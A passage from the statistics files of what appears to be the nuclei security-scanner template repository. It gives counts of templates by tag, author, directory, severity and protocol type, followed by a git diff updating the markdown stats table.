me":"keenetic","count":1},{"name":"turbocrm","count":1},{"name":"checkmarx","count":1},{"name":"bing","count":1},{"name":"fcm","count":1},{"name":"opencart","count":1},{"name":"blockchain","count":1},{"name":"expose","count":1},{"name":"fiori","count":1},{"name":"vsftpd","count":1},{"name":"particle","count":1},{"name":"seopanel","count":1},{"name":"restler","count":1},{"name":"flexbe","count":1},{"name":"wing-ftp","count":1},{"name":"open-redirect","count":1},{"name":"pyramid","count":1},{"name":"emessage","count":1},{"name":"cname","count":1},{"name":"goip","count":1},{"name":"superset","count":1},{"name":"microfocus","count":1},{"name":"fedora","count":1},{"name":"clockwork","count":1},{"name":"opm","count":1},{"name":"logontracer","count":1},{"name":"onelogin","count":1},{"name":"opensso","count":1},{"name":"solman","count":1},{"name":"eyelock","count":1},{"name":"addpac","count":1},{"name":"workreap","count":1},{"name":"knowage","count":1},{"name":"qdpm","count":1},{"name":"duomicms","count":1},{"name":"veeam","count":1},{"name":"strider","count":1},{"name":"tectuus","count":1},{"name":"kubeflow","count":1},{"name":"alltube","count":1},{"name":"xproxy","count":1},{"name":"directum","count":1},{"name":"plc","count":1},{"name":"rhymix","count":1},{"name":"solarlog","count":1},{"name":"tor","count":1},{"name":"bitrise","count":1},{"name":"deviantart","count":1},{"name":"iconfinder","count":1},{"name":"shiro","count":1},{"name":"phpfusion","count":1},{"name":"saml","count":1},{"name":"weiphp","count":1},{"name":"gsm","count":1},{"name":"goanywhere","count":1},{"name":"urlscan","count":1},{"name":"bedita","count":1},{"name":"europeana","count":1},{"name":"clearbit","count":1},{"name":"h5sconsole","count":1},{"name":"xvr","count":1},{"name":"workresources","count":1},{"name":"tieline","count":1},{"name":"mpsec","count":1},{"name":"playable","count":1},{"name":"polarisft","count":1},{"name":"redhat","count":1},{"name":"sage","count":1},{"name":"cerebro","count":1},{"n
ame":"oidc","count":1},{"name":"siebel","count":1},{"name":"webftp","count":1},{"name":"email","count":1},{"name":"zms","count":1},{"name":"place","count":1},{"name":"threatq","count":1},{"name":"okta","count":1},{"name":"route","count":1},{"name":"lenovo","count":1},{"name":"dbeaver","count":1},{"name":"adiscon","count":1},{"name":"kramer","count":1},{"name":"adafruit","count":1},{"name":"wmt","count":1},{"name":"limit","count":1},{"name":"beanstalk","count":1},{"name":"maccmsv10","count":1},{"name":"klog","count":1},{"name":"graylog","count":1},{"name":"inspur","count":1},{"name":"openx","count":1},{"name":"skywalking","count":1},{"name":"dbt","count":1},{"name":"xoops","count":1},{"name":"b2evolution","count":1},{"name":"servicedesk","count":1},{"name":"cse","count":1},{"name":"extreme","count":1},{"name":"boa","count":1},{"name":"stytch","count":1},{"name":"hue","count":1},{"name":"scalar","count":1},{"name":"autocomplete","count":1},{"name":"etouch","count":1},{"name":"saltapi","count":1},{"name":"privx","count":1},{"name":"starttls","count":1},{"name":"loqate","count":1},{"name":"projectdiscovery","count":1},{"name":"nuxeo","count":1},{"name":"secmail","count":1},{"name":"unisharp","count":1},{"name":"lacie","count":1},{"name":"tugboat","count":1},{"name":"noptin","count":1},{"name":"thecatapi","count":1},{"name":"panasonic","count":1},{"name":"jspxcms","count":1},{"name":"roads","count":1},{"name":"dropbox","count":1},{"name":"loytec","count":1},{"name":"contactform","count":1},{"name":"realteo","count":1},{"name":"omi","count":1},{"name":"asus","count":1},{"name":"jumpcloud","count":1},{"name":"intelliflash","count":1},{"name":"gateway","count":1},{"name":"bookstack","count":1},{"name":"cve2001","count":1},{"name":"totaljs","count":1},{"name":"lfw","count":1},{"name":"nerdgraph","count":1},{"name":"myanimelist","count":1},{"name":"bitcoinaverage","count":1},{"name":"launchdarkly","count":1},{"name":"oscommerce","count":1},{"name":"gcp","count":1},{"name":"st
ruts2","count":1},{"name":"remkon","count":1},{"name":"calendly","count":1},{"name":"accuweather","count":1},{"name":"geutebruck","count":1},{"name":"idor","count":1},{"name":"daybyday","count":1},{"name":"cve2004","count":1},{"name":"cryptocurrencies","count":1},{"name":"pagespeed","count":1},{"name":"jenzabar","count":1},{"name":"timeclock","count":1},{"name":"phpwiki","count":1},{"name":"teltonika","count":1},{"name":"bingmaps","count":1},{"name":"tensorboard","count":1},{"name":"securepoint","count":1},{"name":"chronoforums","count":1},{"name":"tensorflow","count":1},{"name":"opnsense","count":1},{"name":"vsphere","count":1},{"name":"ssltls","count":1},{"name":"solarview","count":1},{"name":"synapse","count":1},{"name":"cloudera","count":1},{"name":"default","count":1},{"name":"dotnet","count":1},{"name":"groupoffice","count":1},{"name":"maxsite","count":1},{"name":"visualstudio","count":1},{"name":"dvr","count":1},{"name":"ruoyi","count":1},{"name":"micro","count":1},{"name":"smartsense","count":1},{"name":"malshare","count":1},{"name":"cron","count":1},{"name":"epm","count":1},{"name":"overflow","count":1},{"name":"mdb","count":1},{"name":"submitty","count":1},{"name":"taiga","count":1},{"name":"piwigo","count":1},{"name":"webui","count":1},{"name":"dreamweaver","count":1},{"name":"yachtcontrol","count":1},{"name":"trello","count":1},{"name":"ecshop","count":1},{"name":"travis","count":1},{"name":"blueiris","count":1},{"name":"supervisor","count":1},{"name":"aniapi","count":1},{"name":"biqsdrive","count":1},{"name":"dribbble","count":1},{"name":"gstorage","count":1},{"name":"svn","count":1},{"name":"pyspider","count":1},{"name":"hirak","count":1},{"name":"defectdojo","count":1},{"name":"netgenie","count":1},{"name":"salesforce","count":1},{"name":"eyoumail","count":1},{"name":"camunda","count":1},{"name":"oam","count":1},{"name":"objectinjection","count":1},{"name":"activecollab","count":1},{"name":"formcraft3","count":1},{"name":"paneil","count":1},{"name":"t
elecom","count":1},{"name":"smi","count":1},{"name":"mappress","count":1},{"name":"wpqa","count":1},{"name":"krweb","count":1},{"name":"covalent","count":1},{"name":"micro-user-service","count":1},{"name":"manager","count":1},{"name":"coinlayer","count":1},{"name":"api-manager","count":1},{"name":"vms","count":1},{"name":"moinmoin","count":1},{"name":"server","count":1},{"name":"mdm","count":1},{"name":"nutanix","count":1},{"name":"mtheme","count":1},{"name":"graphiql","count":1},{"name":"glowroot","count":1},{"name":"primetek","count":1},{"name":"cve2002","count":1},{"name":"shindig","count":1},{"name":"jsp","count":1},{"name":"malwarebazaar","count":1},{"name":"xmlchart","count":1},{"name":"ymhome","count":1},{"name":"announcekit","count":1},{"name":"kenesto","count":1},{"name":"mod-proxy","count":1},{"name":"formalms","count":1},{"name":"diris","count":1},{"name":"cassandra","count":1},{"name":"amcrest","count":1},{"name":"phpfastcache","count":1},{"name":"zookeeper","count":1},{"name":"emlog","count":1},{"name":"festivo","count":1},{"name":"newrelic","count":1},{"name":"pastebin","count":1},{"name":"blackboard","count":1},{"name":"webmodule-ee","count":1},{"name":"ecsimagingpacs","count":1},{"name":"gpon","count":1},{"name":"guppy","count":1},{"name":"emc","count":1},{"name":"mongoshake","count":1},{"name":"web-suite","count":1},{"name":"pihole","count":1},{"name":"dwr","count":1},{"name":"simplecrm","count":1},{"name":"hiawatha","count":1},{"name":"dasan","count":1},{"name":"nearby","count":1},{"name":"web3storage","count":1},{"name":"geocode","count":1},{"name":"huijietong","count":1},{"name":"monitorr","count":1},{"name":"upnp","count":1},{"name":"webpconverter","count":1},{"name":"clansphere","count":1},{"name":"netmask","count":1},{"name":"calendarific","count":1},{"name":"ocs-inventory","count":1},{"name":"cx","count":1},{"name":"radius","count":1},{"name":"mkdocs","count":1},{"name":"pendo","count":1},{"name":"emerson","count":1},{"name":"kodi","count":1}
,{"name":"phpunit","count":1},{"name":"securityspy","count":1},{"name":"flask","count":1},{"name":"nimble","count":1},{"name":"siteomat","count":1},{"name":"rmi","count":1},{"name":"sponip","count":1},{"name":"emby","count":1},{"name":"acsoft","count":1},{"name":"svnserve","count":1},{"name":"commscope","count":1},{"name":"scanii","count":1},{"name":"webex","count":1},{"name":"viaware","count":1},{"name":"spf","count":1},{"name":"etherscan","count":1},{"name":"kindeditor","count":1},{"name":"rmc","count":1},{"name":"magicflow","count":1},{"name":"etcd","count":1},{"name":"74cms","count":1},{"name":"pan","count":1},{"name":"pirelli","count":1},{"name":"wago","count":1},{"name":"jinfornet","count":1},{"name":"zoomsounds","count":1},{"name":"cooperhewitt","count":1},{"name":"ptr","count":1},{"name":"leanix","count":1},{"name":"intellislot","count":1},{"name":"kronos","count":1},{"name":"lg-nas","count":1},{"name":"agegate","count":1},{"name":"jaspersoft","count":1},{"name":"superwebmailer","count":1},{"name":"tink","count":1},{"name":"appveyor","count":1},{"name":"tracer","count":1},{"name":"sco","count":1},{"name":"acme","count":1},{"name":"mirasys","count":1},{"name":"shopware","count":1},{"name":"vision","count":1},{"name":"fortilogger","count":1}],"authors":[{"name":"daffainfo","count":564},{"name":"dhiyaneshdk","count":423},{"name":"pikpikcu","count":315},{"name":"pdteam","count":262},{"name":"geeknik","count":179},{"name":"dwisiswant0","count":168},{"name":"princechaddha","count":137},{"name":"0x_akoko","count":134},{"name":"gy741","count":119},{"name":"pussycat0x","count":116},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":49},{"name":"ritikchaddha","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"adam 
crosser","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":23},{"name":"ffffffff0x","count":22},{"name":"akincibor","count":20},{"name":"for3stco1d","count":18},{"name":"righettod","count":18},{"name":"cckuailong","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":14},{"name":"r3dg33k","count":14},{"name":"sharath","count":13},{"name":"suman_kar","count":12},{"name":"sullo","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"melbadry9","count":11},{"name":"johnk3r","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":10},{"name":"alph4byt3","count":10},{"name":"random_robbie","count":10},{"name":"meme-lord","count":10},{"name":"dogasantos","count":10},{"name":"emadshanab","count":9},{"name":"edoardottt","count":9},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"divya_mudgal","count":7},{"name":"forgedhallpass","count":7},{"name":"dr_set","count":7},{"name":"logicalhunter","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"random-robbie","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"evan 
rubinstein","count":6},{"name":"leovalcante","count":6},{"name":"pathtaga","count":6},{"name":"rootxharsh","count":6},{"name":"pentest_swissky","count":6},{"name":"iamnoooob","count":6},{"name":"caspergn","count":6},{"name":"yanyun","count":5},{"name":"tess","count":5},{"name":"lu4nx","count":5},{"name":"joanbono","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"imnightmaree","count":5},{"name":"ganofins","count":5},{"name":"xelkomy","count":5},{"name":"podalirius","count":5},{"name":"panch0r3d","count":5},{"name":"veshraj","count":5},{"name":"elsfa7110","count":5},{"name":"_0xf4n9x_","count":5},{"name":"defr0ggy","count":4},{"name":"dadevel","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"dolev farhi","count":4},{"name":"incogbyte","count":4},{"name":"h1ei1","count":4},{"name":"wisnupramoedya","count":4},{"name":"tanq16","count":4},{"name":"gitlab red team","count":3},{"name":"mr-xn","count":3},{"name":"andydoering","count":3},{"name":"skeltavik","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"johnjhacking","count":3},{"name":"davidmckennirey","count":3},{"name":"shifacyclewala","count":3},{"name":"github.com/its0x08","count":3},{"name":"shine","count":3},{"name":"alifathi-h1","count":3},{"name":"fyoorer","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"r3naissance","count":3},{"name":"_generic_human_","count":3},{"name":"z3bd","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"jarijaas","count":3},{"name":"arcc","count":3},{"name":"thomas_from_offensity","count":3},{"name":"mavericknerd","count":3},{"name":"supras","count":3},{"name":"lark-lab","count":3},{"name":"sushantkamble","count":3},{"name":"whoever","count":3},{"name":"0w4ys","count":3},{"name":"dudez","count":3},{"name":"hassan khan yusufzai - 
splint3r7","count":2},{"name":"0xrudra","count":2},{"name":"0xcrypto","count":2},{"name":"splint3r7","count":2},{"name":"randomrobbie","count":2},{"name":"fabaff","count":2},{"name":"cocxanh","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"redteambrasil","count":2},{"name":"hackerarpan","count":2},{"name":"dheerajmadhukar","count":2},{"name":"rafaelwdornelas","count":2},{"name":"sbani","count":2},{"name":"z0ne","count":2},{"name":"smaranchand","count":2},{"name":"hahwul","count":2},{"name":"swissky","count":2},{"name":"geekby","count":2},{"name":"dahse89","count":2},{"name":"cckuakilong","count":2},{"name":"paradessia","count":2},{"name":"vsh00t","count":2},{"name":"paperpen","count":2},{"name":"x1m_martijn","count":2},{"name":"taielab","count":2},{"name":"vavkamil","count":2},{"name":"0xelkomy","count":2},{"name":"badboycxcc","count":2},{"name":"ehsahil","count":2},{"name":"bananabr","count":2},{"name":"0xsmiley","count":2},{"name":"udit_thakkur","count":2},{"name":"socketz","count":2},{"name":"pxmme1337","count":2},{"name":"danielmofer","count":2},{"name":"thardt-praetorian","count":2},{"name":"its0x08","count":2},{"name":"kre80r","count":2},{"name":"lotusdll","count":2},{"name":"nuk3s3c","count":2},{"name":"ambassify","count":2},{"name":"kiblyn11","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"gevakun","count":2},{"name":"nvn1729","count":2},{"name":"k11h-de","count":2},{"name":"0ri2n","count":2},{"name":"y4er","count":2},{"name":"afaq","count":2},{"name":"hetroublemakr","count":2},{"name":"huowuzhao","count":2},{"name":"joeldeleep","count":2},{"name":"parth","count":2},{"name":"g4l1t0","count":2},{"name":"zomsop82","count":2},{"name":"amsda","count":2},{"name":"joshlarsen","count":2},{"name":"bernardofsr","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"mohammedsaneem","count":2},{"name":"sy3omda","count":2},{"name":"bing0o","count":2},{"name":"0xsapra","count":2},{"name":"gal 
nagli","count":2},{"name":"bsysop","count":2},{"name":"manas_harsh","count":2},{"name":"3th1c_yuk1","count":2},{"name":"martincodes-de","count":2},{"name":"w4cky_","count":2},{"name":"bp0lr","count":2},{"name":"ree4pwn","count":2},{"name":"r12w4n","count":2},{"name":"luci","count":2},{"name":"raesene","count":2},{"name":"ajaysenr","count":2},{"name":"nkxxkn","count":2},{"name":"convisoappsec","count":2},{"name":"koti2","count":2},{"name":"foulenzer","count":2},{"name":"luqmaan hadia","count":1},{"name":"brabbit10","count":1},{"name":"0xh7ml","count":1},{"name":"furkansayim","count":1},{"name":"jteles","count":1},{"name":"kiks7","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"tirtha_mandal","count":1},{"name":"f1she3","count":1},{"name":"ilovebinbash","count":1},{"name":"apt-mirror","count":1},{"name":"elder tao","count":1},{"name":"geraldino2","count":1},{"name":"0xceeb","count":1},{"name":"remonsec","count":1},{"name":"florianmaak","count":1},{"name":"hanlaomo","count":1},{"name":"mass0ma","count":1},{"name":"luqman","count":1},{"name":"andysvints","count":1},{"name":"sherlocksecurity","count":1},{"name":"hakluke","count":1},{"name":"ohlinge","count":1},{"name":"0xtavian","count":1},{"name":"wabafet","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"matthew nickerson (b0than) @ layer 8 
security","count":1},{"name":"kurohost","count":1},{"name":"ola456","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sshell","count":1},{"name":"elmahdi","count":1},{"name":"_harleo","count":1},{"name":"arr0way","count":1},{"name":"ldionmarcil","count":1},{"name":"fopina","count":1},{"name":"becivells","count":1},{"name":"retr0","count":1},{"name":"pdp","count":1},{"name":"zhenwarx","count":1},{"name":"deena","count":1},{"name":"x6263","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"majidmc2","count":1},{"name":"mhdsamx","count":1},{"name":"anon-artist","count":1},{"name":"daviey","count":1},{"name":"jbaines-r7","count":1},{"name":"revblock","count":1},{"name":"jas37","count":1},{"name":"jeya seelan","count":1},{"name":"shelld3v","count":1},{"name":"duty_1g","count":1},{"name":"skylark-lab","count":1},{"name":"thezakman","count":1},{"name":"s1r1u5_","count":1},{"name":"yashgoti","count":1},{"name":"breno_css","count":1},{"name":"orpheus","count":1},{"name":"igibanez","count":1},{"name":"0xteles","count":1},{"name":"brenocss","count":1},{"name":"clarkvoss","count":1},{"name":"miroslavsotak","count":1},{"name":"izn0u","count":1},{"name":"droberson","count":1},{"name":"ipanda","count":1},{"name":"rubina119","count":1},{"name":"berkdusunur","count":1},{"name":"blckraven","count":1},{"name":"xstp","count":1},{"name":"nielsing","count":1},{"name":"bjhulst","count":1},{"name":"fq_hsu","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"affix","count":1},{"name":"whynotke","count":1},{"name":"kaizensecurity","count":1},{"name":"udyz","count":1},{"name":"ph33r","count":1},{"name":"francescocarlucci","count":1},{"name":"v0idc0de","count":1},{"name":"flag007","count":1},{"name":"dievus","count":1},{"name":"j33n1k4","count":1},{"name":"toufik-airane","count":1},{"name":"streetofhackerr007 (rohit 
soni)","count":1},{"name":"soyelmago","count":1},{"name":"kabirsuda","count":1},{"name":"myztique","count":1},{"name":"tea","count":1},{"name":"juicypotato1","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"b4uh0lz","count":1},{"name":"momen eldawakhly","count":1},{"name":"hexcat","count":1},{"name":"oscarintherocks","count":1},{"name":"patralos","count":1},{"name":"infosecsanyam","count":1},{"name":"notsoevilweasel","count":1},{"name":"evolutionsec","count":1},{"name":"kailashbohara","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"zandros0","count":1},{"name":"compr00t","count":1},{"name":"manasmbellani","count":1},{"name":"charanrayudu","count":1},{"name":"_c0wb0y_","count":1},{"name":"thesubtlety","count":1},{"name":"notnotnotveg","count":1},{"name":"alperenkesk","count":1},{"name":"schniggie","count":1},{"name":"ahmed sherif","count":1},{"name":"sec_hawk","count":1},{"name":"bartu utku sarp","count":1},{"name":"opencirt","count":1},{"name":"osamahamad","count":1},{"name":"cookiehanhoan","count":1},{"name":"iphantasmic","count":1},{"name":"regala_","count":1},{"name":"pudsec","count":1},{"name":"willd96","count":1},{"name":"xeldax","count":1},{"name":"ggranjus","count":1},{"name":"korteke","count":1},{"name":"adrianmf","count":1},{"name":"0xrod","count":1},{"name":"c3l3si4n","count":1},{"name":"p-l-","count":1},{"name":"yashanand155","count":1},{"name":"omarkurt","count":1},{"name":"coldfish","count":1},{"name":"ooooooo_q","count":1},{"name":"rojanrijal","count":1},{"name":"thevillagehacker","count":1},{"name":"petruknisme","count":1},{"name":"undefl0w","count":1},{"name":"exceed","count":1},{"name":"mah3sec_","count":1},{"name":"justmumu","count":1},{"name":"noobexploiter","count":1},{"name":"phyr3wall","count":1},{"name":"fmunozs","count":1},{"name":"mesaglio","count":1},{"name":"xshuden","count":1},{"name":"ofjaaah","count":1},{"name":"0xceba","count":1},{"name":"manuelbua","count":1},{"name":"jiheon-dev","count":1},{"name
":"ahmed abou-ela","count":1},{"name":"ringo","count":1},{"name":"b0yd","count":1},{"name":"gboddin","count":1},{"name":"0ut0fb4nd","count":1},{"name":"d4vy","count":1},{"name":"alevsk","count":1},{"name":"nerrorsec","count":1},{"name":"ahmetpergamum","count":1},{"name":"th3.d1p4k","count":1},{"name":"absshax","count":1},{"name":"mrcl0wnlab","count":1},{"name":"act1on3","count":1},{"name":"furkansenan","count":1},{"name":"chron0x","count":1},{"name":"tirtha","count":1},{"name":"daffianfo","count":1},{"name":"kareemse1im","count":1},{"name":"dhiyaneshdki","count":1},{"name":"0h1in9e","count":1},{"name":"pratik khalane","count":1},{"name":"luskabol","count":1},{"name":"zinminphy0","count":1},{"name":"mubassirpatel","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"co0nan","count":1},{"name":"prajiteshsingh","count":1},{"name":"clment cruchet","count":1},{"name":"yavolo","count":1},{"name":"streetofhackerr007","count":1},{"name":"vzamanillo","count":1},{"name":"b0rn2r00t","count":1},{"name":"zsusac","count":1},{"name":"ok_bye_now","count":1},{"name":"akshansh","count":1},{"name":"shifacyclewla","count":1},{"name":"d0rkerdevil","count":1},{"name":"intx0x80","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"alexrydzak","count":1},{"name":"amnotacat","count":1},{"name":"bad5ect0r","count":1},{"name":"knassar702","count":1},{"name":"husain","count":1},{"name":"jrolf","count":1},{"name":"shreyapohekar","count":1},{"name":"nytr0gen","count":1},{"name":"andirrahmani1","count":1},{"name":"0xd0ff9","count":1},{"name":"yuansec","count":1},{"name":"iampritam","count":1},{"name":"sickwell","count":1},{"name":"elouhi","count":1},{"name":"noamrathaus","count":1},{"name":"aresx","count":1},{"name":"retr02332","count":1},{"name":"qlkwej","count":1},{"name":"jeya.seelan","count":1},{"name":"evan rubinstien","count":1},{"name":"dawid-czarnecki","count":1},{"name":"aaron_costello 
(@conspiracyproof)","count":1},{"name":"rodnt","count":1},{"name":"wlayzz","count":1},{"name":"harshinsecurity","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"lark lab","count":1},{"name":"rschio","count":1},{"name":"exploitation","count":1},{"name":"arm!tage","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"akash.c","count":1},{"name":"bughuntersurya","count":1},{"name":"narluin","count":1},{"name":"un-fmunozs","count":1},{"name":"borna nematzadeh","count":1},{"name":"prettyboyaaditya","count":1},{"name":"push4d","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"rotemreiss","count":1},{"name":"micha3lb3n","count":1},{"name":"makyotox","count":1},{"name":"sicksec","count":1},{"name":"exid","count":1},{"name":"official_blackhat13","count":1},{"name":"arall","count":1},{"name":"2rs3c","count":1},{"name":"_darrenmartyn","count":1},{"name":"philippdelteil","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"alex","count":1},{"name":"lethargynavigator","count":1},{"name":"aaronchen0","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo 
(@palaziv)","count":1},{"name":"thebinitghimire","count":1}],"directory":[{"name":"cves","count":1172},{"name":"exposed-panels","count":525},{"name":"vulnerabilities","count":453},{"name":"technologies","count":256},{"name":"exposures","count":204},{"name":"misconfiguration","count":200},{"name":"workflows","count":187},{"name":"token-spray","count":155},{"name":"default-logins","count":96},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"cnvd","count":23},{"name":"miscellaneous","count":23},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1198},{"name":"high","count":885},{"name":"medium","count":667},{"name":"critical","count":415},{"name":"low","count":182},{"name":"unknown","count":6}],"types":[{"name":"http","count":3209},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 642101fab0..6a40e01402 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md 
@@ -1,1080 +1,1565 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 | -| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 | -| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 | -| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 | -| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | | -| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | | -| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | | -| tech | 223 | gy741 | 88 | takeovers | 65 | | | | | -| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | | -| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | | -| cve2020 | 171 | madrobot | 65 | workflows | 44 | | | | | -| joomla | 128 | zzeitlin | 64 | iot | 36 | | | | | -| token-spray | 127 | gaurang | 42 | network | 34 | | | | | -| cve2010 | 109 | philippedelteil | 32 | miscellaneous | 22 | | | | | -| cve2019 | 106 | ice3man | 26 | dns | 12 | | | | | -| cve2018 | 101 | organiccrap | 24 | fuzzing | 10 | | | | | -| config | 100 | pr3r00t | 15 | cnvd | 10 | | | | | -| iot | 84 | sheikhrishad | 15 | headless | 5 | | | | | -| apache | 80 | milo2012 | 14 | | | | | | | -| oast | 80 | techbrunchfr | 13 | | | | | | | -| default-login | 71 | suman_kar | 12 | | | | | | | -| takeover | 69 | r3dg33k | 12 | | | | | | | -| token | 68 | righettod | 12 | | | | | | | -| unauth | 57 | cyllective | 11 | | | | | | | -| file | 57 | hackergautam | 10 | | | | | | | -| cve2017 | 56 | random_robbie | 10 | | | | | | | -| ssrf | 47 | nadino | 10 | | | | | | | -| sqli | 46 | melbadry9 | 10 | | | | | | | -| network | 45 | wdahlenb | 10 | | | | | | | -| | 44 | alph4byt3 | 9 | | | | | | | -| oracle | 41 | 
emadshanab | 8 | | | | | | | -| misconfig | 41 | that_juan_ | 8 | | | | | | | -| cve2016 | 40 | iamthefrogy | 8 | | | | | | | -| redirect | 38 | zh | 8 | | | | | | | -| logs | 34 | aashiq | 8 | | | | | | | -| google | 31 | meme-lord | 8 | | | | | | | -| cve2015 | 31 | harshbothra_ | 7 | | | | | | | -| jira | 30 | dr_set | 7 | | | | | | | -| cisco | 29 | oppsec | 7 | | | | | | | -| atlassian | 29 | divya_mudgal | 7 | | | | | | | -| listing | 29 | kophjager007 | 7 | | | | | | | -| cve2014 | 28 | dogasantos | 7 | | | | | | | -| auth-bypass | 27 | 0x240x23elu | 7 | | | | | | | -| router | 26 | techryptic (@tech) | 7 | | | | | | | -| generic | 24 | randomstr1ng | 7 | | | | | | | -| disclosure | 22 | pentest_swissky | 6 | | | | | | | -| misc | 21 | johnk3r | 6 | | | | | | | -| aem | 20 | iamnoooob | 6 | | | | | | | -| login | 19 | rootxharsh | 6 | | | | | | | -| debug | 19 | logicalhunter | 6 | | | | | | | -| cve2012 | 19 | __fazal | 6 | | | | | | | -| sap | 18 | puzzlepeaches | 6 | | | | | | | -| springboot | 18 | caspergn | 6 | | | | | | | -| php | 16 | yanyun | 5 | | | | | | | -| wp-theme | 16 | panch0r3d | 5 | | | | | | | -| weblogic | 16 | lu4nx | 5 | | | | | | | -| aws | 15 | adam crosser | 5 | | | | | | | -| devops | 15 | elsfa7110 | 5 | | | | | | | -| fuzz | 15 | xelkomy | 5 | | | | | | | -| cve2011 | 15 | joanbono | 5 | | | | | | | -| cve2009 | 14 | idealphase | 5 | | | | | | | -| struts | 14 | ganofins | 5 | | | | | | | -| adobe | 14 | _0xf4n9x_ | 4 | | | | | | | -| deserialization | 14 | incogbyte | 4 | | | | | | | -| android | 13 | forgedhallpass | 4 | | | | | | | -| dns | 13 | nodauf | 4 | | | | | | | -| dlink | 13 | leovalcante | 4 | | | | | | | -| intrusive | 13 | wisnupramoedya | 4 | | | | | | | -| xxe | 12 | defr0ggy | 4 | | | | | | | -| zoho | 12 | tess | 4 | | | | | | | -| manageengine | 12 | e_schultze_ | 4 | | | | | | | -| jenkins | 12 | fyoorer | 3 | | | | | | | -| magento | 11 | unstabl3 | 3 | | | | | | | -| hp | 11 | emenalf | 3 | | | | | | | -| 
cve2013 | 11 | sushantkamble | 3 | | | | | | | -| microsoft | 11 | alifathi-h1 | 3 | | | | | | | -| ibm | 11 | 0w4ys | 3 | | | | | | | -| dell | 10 | _generic_human_ | 3 | | | | | | | -| cms | 9 | github.com/its0x08 | 3 | | | | | | | -| fastjson | 9 | johnjhacking | 3 | | | | | | | -| fileupload | 9 | yash anand @yashanand155 | 3 | | | | | | | -| gitlab | 9 | me9187 | 3 | | | | | | | -| vmware | 9 | r3naissance | 3 | | | | | | | -| kubernetes | 9 | jarijaas | 3 | | | | | | | -| airflow | 9 | binaryfigments | 3 | | | | | | | -| rails | 9 | imnightmaree | 3 | | | | | | | -| cve2008 | 9 | mavericknerd | 3 | | | | | | | -| ftp | 9 | vsh00t | 3 | | | | | | | -| scada | 8 | shine | 3 | | | | | | | -| netgear | 8 | skeltavik | 3 | | | | | | | -| nginx | 8 | f1tz | 3 | | | | | | | -| backup | 8 | dudez | 3 | | | | | | | -| cnvd | 8 | lark-lab | 3 | | | | | | | -| ruijie | 8 | z3bd | 3 | | | | | | | -| coldfusion | 8 | sullo | 3 | | | | | | | -| django | 7 | impramodsargar | 3 | | | | | | | -| solr | 7 | thomas_from_offensity | 3 | | | | | | | -| files | 7 | shifacyclewala | 3 | | | | | | | -| prometheus | 7 | andydoering | 3 | | | | | | | -| camera | 7 | swissky | 2 | | | | | | | -| confluence | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| drupal | 6 | ehsahil | 2 | | | | | | | -| rconfig | 6 | moritz nentwig | 2 | | | | | | | -| squirrelmail | 6 | dheerajmadhukar | 2 | | | | | | | -| grafana | 6 | mohammedsaneem | 2 | | | | | | | -| api | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| phpmyadmin | 6 | k11h-de | 2 | | | | | | | -| go | 6 | bing0o | 2 | 